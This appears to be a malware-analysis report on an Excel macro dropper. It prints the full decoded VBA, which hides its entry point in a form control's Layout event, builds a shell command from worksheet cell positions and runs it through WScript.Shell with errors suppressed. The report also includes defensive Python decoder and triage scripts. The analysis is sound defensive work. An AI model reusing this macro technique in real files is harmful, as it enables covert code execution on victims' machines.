Xls.Dropper.Agent-8810704-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 c898e064e2030566…

MALICIOUS

Office (OOXML)

Size: 35.3 KB
Created: 2020-07-13 11:16:32 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-09-15
MD5: 3387406ff10f4b2eddf8736429265604
SHA-1: f996ae36d7c2d8b98e1a5174c2a31c86b77a2b38
SHA-256: c898e064e2030566e29594c3ef3cbe6720304861fb0126dfed0477de444d63c4
Risk score: 240

Malware Insights

Xls.Dropper.Agent-8810704-0 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is an Excel workbook whose VBA project builds a command string at run time and runs it through WScript.Shell. The code lives in A_Layout, the Layout event handler of an MSForms Frame control named A embedded in Sheet1 (Attribute VB_Control = "A, 1, 0, MSForms, Frame"), rather than in a conventional Workbook_Open or Auto_Open entry point. It walks every constant cell in the active sheet's used range and sets c(Ee.value) = Chr(Ee.Row): each cell contributes one character whose code is the cell's row number and whose position in the command is the cell's value. The array is then concatenated into fig and passed to CreateObject("Wscript.Shell").exec(fig) under On Error Resume Next, after which the workbook is closed without saving. The command itself is therefore not present in the macro; recovering it requires the worksheet's cell values and positions, not only the VBA. The behaviour is consistent with a dropper that fetches and runs a second-stage payload, as the ClamAV name Xls.Dropper.Agent-8810704-0 suggests, but neither the payload nor its source can be confirmed from the macro alone. The Print line carrying the exec call is malformed as VBA source, so before relying on the decoded listing compare it with the compiled p-code (pcodedmp, or olevba --pcode) in case the source stream and the p-code disagree.
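The cell-to-command scheme described above, as an added example written for this report (not code from the sample or from oletools). The sample's worksheet is not on this page, so build_sheet_cells() constructs a hypothetical layout that encodes a harmless command; cells_from_xlsx() is a loader for a real file and assumes openpyxl is installed. The decoder mirrors the macro's semantics: index = cell value, character = Chr(row), later cells overwrite earlier ones in row-major order, empty slots add nothing, and cells the macro itself could not handle are reported instead of silently used.

```python
"""Reconstruct the command that an Xls.Dropper-style macro assembles from
worksheet cells with  c(Ee.value) = Chr(Ee.Row)  and then joins in index order.

Added example for this report; not code from the sample or from oletools.
The sample's sheet is not on the page, so build_sheet_cells() constructs a
hypothetical layout. cells_from_xlsx() reads a real workbook and assumes
openpyxl is installed.
"""
from collections import defaultdict

ARRAY_SIZE = 2399   # Dim c(2398): valid indices 0..2398


def decode_cells(cells, array_size=ARRAY_SIZE):
    """cells: iterable of (row, column, value) for constant (non-formula) cells.

    Mirrors the macro's two loops:
        For Each Ee In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
            c(Ee.value) = Chr(Ee.Row)
        Next
        For Each k In c: fig = fig + k: Next
    Returns (command, skipped). `skipped` lists cells on which the real macro
    would raise (it has no On Error around the first loop), so a non-empty
    list means the sheet is not laid out the way this macro expects.
    """
    slots = [""] * array_size              # unassigned slots are Empty and add nothing
    skipped = []
    # Excel yields SpecialCells row-major; a later cell with the same value wins.
    for row, col, value in sorted(cells, key=lambda c: (c[0], c[1])):
        if isinstance(value, bool) or not isinstance(value, (int, float)):
            skipped.append((row, col, value, "not usable as array index (type mismatch)"))
            continue
        idx = int(round(value))            # VBA coerces a Double index with banker's rounding, like round()
        if not 0 <= idx < array_size:
            skipped.append((row, col, value, "subscript out of range for Dim c(2398)"))
            continue
        if not 1 <= row <= 255:
            skipped.append((row, col, value, "Chr() rejects codes above 255 on a single-byte code page"))
            continue
        slots[idx] = chr(row)              # Chr(Ee.Row): the character is the row number
    return "".join(slots), skipped


def build_sheet_cells(command):
    """Construct a hypothetical sheet layout the macro would decode to `command`:
    character i goes in row ord(ch) holding the value i; repeated characters
    share a row and spread across columns."""
    next_col = defaultdict(lambda: 1)
    cells = []
    for i, ch in enumerate(command):
        row = ord(ch)
        cells.append((row, next_col[row], i))
        next_col[row] += 1
    return cells


def cells_from_xlsx(path, sheet=None):
    """Constant cells of a real workbook (assumes openpyxl). Formula cells are
    dropped because xlCellTypeConstants excludes them; wb.active is the saved
    active tab, which is the ActiveSheet the macro reads on open."""
    from openpyxl import load_workbook
    wb = load_workbook(path)               # data_only=False keeps formulas visible as "=..."
    ws = wb[sheet] if sheet else wb.active
    out = []
    for row_cells in ws.iter_rows():
        for cell in row_cells:
            v = cell.value
            if v is None or (isinstance(v, str) and v.startswith("=")):
                continue
            out.append((cell.row, cell.column, v))
    return out


if __name__ == "__main__":
    demo = build_sheet_cells("cmd /c echo decoded")   # constructed, harmless stand-in
    command, skipped = decode_cells(demo)
    print("rows holding values:", sorted({r for r, _, _ in demo}))
    print("recovered command  :", command)
    print("cells skipped      :", skipped)
```

Because the first VBA loop has no error handler, a real sheet that drives this macro can only hold integer constants in rows 1 to 255; if the decoder reports skipped cells, check that you are reading the sheet that is active when the workbook opens.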

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-8810704-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-8810704-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    On Error Resume Next
    Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
    ActiveWorkbook.Close False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    On Error Resume Next
    Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
    ActiveWorkbook.Close False
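A triage pass over the decoded macro for the indicators the heuristics above flag, plus the one they do not name: the entry point. This is an added example for this report, not part of oletools or of the sample; the regexes and rule names are this example's own, and SAMPLE_VBA is the decoded listing from the extracted macros.bas further down the page. It reports control event handlers such as A_Layout separately from the usual Workbook_Open/Auto_Open names, since those conventional names are what most auto-exec keyword lists key on.

```python
"""Triage an extracted VBA listing for the pattern seen in this sample: the
entry point is an MSForms control event on a worksheet and the payload is a
WScript.Shell exec of a string assembled at run time.

Added example for this report; not part of oletools or the sample. The
regexes and rule names are this example's own. SAMPLE_VBA is the decoded
macro listing from the page.
"""
import re

SAMPLE_VBA = r'''Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "A, 1, 0, MSForms, Frame"
Private Sub A_Layout()
Dim c(2398)
For Each Ee In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
c(Ee.value) = Chr(Ee.Row)
Next
For Each k In c
fig = fig + k
Next
On Error Resume Next
Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
ActiveWorkbook.Close False
End Sub
Sub lets()
MsgBox "": h = 12
End Sub'''

# Indicator patterns (this example's own names, not olevba's).
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I),
    "shell_exec": re.compile(r'\.(exec|run)\s*\(', re.I),
    "chr_builder": re.compile(r'\bChr\s*\(', re.I),
    "cell_harvest": re.compile(r'SpecialCells\s*\(', re.I),
    "error_suppression": re.compile(r'On Error Resume Next', re.I),
}
CONTROL_ATTR = re.compile(r'Attribute VB_Control = "(\w+), \d+, \d+, (\w+), (\w+)"')
SUB_DEF = re.compile(r'^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+?)_(\w+)\s*\(', re.I)
# Conventional auto-exec handler names that keyword-based triage usually keys on.
AUTOEXEC = {"workbook_open", "auto_open", "document_open", "autoopen", "workbook_activate"}


def find_controls(src):
    """Embedded controls declared by VB_Control attributes: (name, library, class)."""
    return [m.groups() for m in CONTROL_ATTR.finditer(src)]


def find_entry_points(src):
    """Event handlers that can run code: conventional auto-exec names, plus
    <control>_<Event> handlers for any control declared in the listing."""
    controls = {name for name, _, _ in find_controls(src)}
    found = []
    for lineno, line in enumerate(src.splitlines(), 1):
        m = SUB_DEF.match(line)
        if not m:
            continue
        obj, event = m.group(1), m.group(2)
        name = f"{obj}_{event}"
        if name.lower() in AUTOEXEC:
            found.append((lineno, name, "auto-exec"))
        elif obj in controls:
            found.append((lineno, name, "control event"))
    return found


def find_indicators(src):
    """(rule, line number, line) for every indicator hit."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for rule, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((rule, lineno, line.strip()))
    return hits


def triage(src):
    entry = find_entry_points(src)
    indicators = find_indicators(src)
    rules = {rule for rule, _, _ in indicators}
    # Shell object + exec/run + a way to get invoked is the dropper shape seen here.
    verdict = "suspicious" if {"wscript_shell", "shell_exec"} <= rules and entry else "review"
    return {"controls": find_controls(src), "entry_points": entry,
            "indicators": indicators, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for key in ("controls", "entry_points", "indicators", "verdict"):
        print(f"{key}: {result[key]}")
```

Run it over any olevba output; the entry_points list is the thing to check when the usual auto-exec keywords do not explain how a macro got to run.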

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1058 bytes
SHA-256: 4d85480660effb9e19d036c20741c00162241852d175c48484056d348568aafa
Extracted script preview (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "A, 1, 0, MSForms, Frame"
Private Sub A_Layout()
Dim c(2398)
For Each Ee In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
c(Ee.value) = Chr(Ee.Row)
Next
For Each k In c
fig = fig + k
Next
On Error Resume Next
Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
ActiveWorkbook.Close False
End Sub
Sub lets()
MsgBox "": h = 12
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 10752 bytes
SHA-256: e3e17661a75445ffd10c6364258e1bbcd96fac6ebdc46c5199b7ca1c0cc54a82
Detection
ClamAV: Xls.Dropper.Agent-8810704-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2024 bytes
SHA-256: 18442f66fc184308368fb113b1c28494dce7331a052469405fcf94f2ee8085b5